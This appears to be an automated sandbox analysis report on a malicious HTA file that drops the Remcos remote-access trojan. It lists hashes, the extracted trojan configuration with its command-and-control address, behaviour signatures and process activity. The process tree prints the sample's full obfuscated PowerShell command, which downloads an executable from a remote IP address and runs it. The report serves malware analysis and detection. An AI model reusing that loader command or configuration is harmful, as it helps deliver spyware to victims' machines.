Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 16:18
Behavioral task
behavioral1
Sample
newthingswithgreatupdateiongivenbestthingswithme.hta
Resource
win7-20240903-en
General
-
Target
newthingswithgreatupdateiongivenbestthingswithme.hta
-
Size
143KB
-
MD5
fd6fc3abb81de5133fb2de54b937ca20
-
SHA1
241f7fa153504078a9a9b07f966f3c4e862a9545
-
SHA256
73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
-
SHA512
5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
-
SSDEEP
768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl
Malware Config
Extracted
remcos
elvis
107.173.4.16:2560
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GJDISH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2328 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2328 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2716 nicetomeetyousweeet.exe -
Loads dropped DLL 4 IoCs
pid Process 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2328 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3064 wrote to memory of 1864 3064 mshta.exe 30 PID 3064 wrote to memory of 1864 3064 mshta.exe 30 PID 3064 wrote to memory of 1864 3064 mshta.exe 30 PID 3064 wrote to memory of 1864 3064 mshta.exe 30 PID 1864 wrote to memory of 2328 1864 cmd.exe 32 PID 1864 wrote to memory of 2328 1864 cmd.exe 32 PID 1864 wrote to memory of 2328 1864 cmd.exe 32 PID 1864 wrote to memory of 2328 1864 cmd.exe 32 PID 2328 wrote to memory of 2476 2328 powershell.exe 33 PID 2328 wrote to memory of 2476 2328 powershell.exe 33 PID 2328 wrote to memory of 2476 2328 powershell.exe 33 PID 2328 wrote to memory of 2476 2328 powershell.exe 33 PID 2476 wrote to memory of 2708 2476 csc.exe 34 PID 2476 wrote to memory of 2708 2476 csc.exe 34 PID 2476 wrote to memory of 2708 2476 csc.exe 34 PID 2476 wrote to memory of 2708 2476 csc.exe 34 PID 2328 wrote to memory of 2716 2328 powershell.exe 36 PID 2328 wrote to memory of 2716 2328 powershell.exe 36 PID 2328 wrote to memory of 2716 2328 powershell.exe 36 PID 2328 wrote to memory of 2716 2328 powershell.exe 36
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingswithgreatupdateiongivenbestthingswithme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z1alkawc.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA989.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA988.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
-
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"4⤵
- Executes dropped EXE
PID:2716
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b07b993dbf20ec2461bc0131bcf93f71
SHA18844816e6f1671c79934bc485afeedc9c2ea5dc5
SHA2561589c53f3ceb5b05b8a54e0e3b6019954e007ef360703d69044d5b5d138f6296
SHA5120ed76d1292b9ed5b85290dc7b950d1dbffebfd14de4abef526d16143af0a2dfb3c93b80d1fd11ccfc04ea82afea9aebdc0e10dc8ea3af2facb1b8d5d051812cc
-
Filesize
3KB
MD5e980be1f4bc04052b56e160288281da9
SHA19d1f0ba82d72068cbf2e2be86fc8df14ce09d0e9
SHA25647bd0ed685aa36657315d07fab8376b4d840a996ab9bfce96872e9ce0c2f1b74
SHA512eee054df683ed1aa1dfa1c5e88066dd8aed4ee4f2cf6ad067a834c5c6348427b4e25b001653da2c466e97ec30f658656383f6446c640592e33a155e3a8a15601
-
Filesize
7KB
MD59cd9eb2a489470d5fd497179da2adb1d
SHA19549f7eac51e612ce59b445b06652addaea1072c
SHA2564c98fca50dc78bfa639cd861b897148bc510ff08f7f21cc46c24838df55e0248
SHA512d5adccaa7ce5889898abd8f7dc1ead7ed559f264d97f164cd761f67afa646b1b0d8068c48f9ee3a3893e4cd1a727711807f333a4ef88e6ba51cae3c06d788921
-
Filesize
652B
MD5d925c58eb2572e5164c6d060d30bbf41
SHA14c4cd11236f9791c31c86968777a4e118156d260
SHA2567e11155436edf7740458207ed62505ea9923656fc293732c2396acbef54d0f2d
SHA512c59c1c0d3ef280e5d6651d704c22ff390dfe236b8fad23532678fe6646865dda2a2f3a9eece97188350ea7b9754ee436a196a623ee1c08011acd7c24b3e077cc
-
Filesize
493B
MD500df4ae943d803cb15795b1fd55ead94
SHA1fc1509b646d150cc4d1c2d92cf772be4af67716b
SHA256e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a
SHA512e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796
-
Filesize
309B
MD52e72a23fb61bdbd13555159a060cb04c
SHA12315d1a5d7517ea7d02049df303802f396d317d9
SHA25668220945da929c4150a9cf2bb8a2272b4652765b0d7d6eee1336c517ecff4b5d
SHA512b58b8ab17dddd9098b01f4ce26c0e97dbcc5b713fcd802079d50b202c93654598d0485ea68689fe98b2d324a0cce688284763e943542ba66c556ffac1606bd44
-
Filesize
528KB
MD5a2d03c5333bfecca62720cd6ee3a4dc4
SHA1ce4c380f2748f375904c17b38d4f93e294fef4f6
SHA256ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e
SHA5125c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c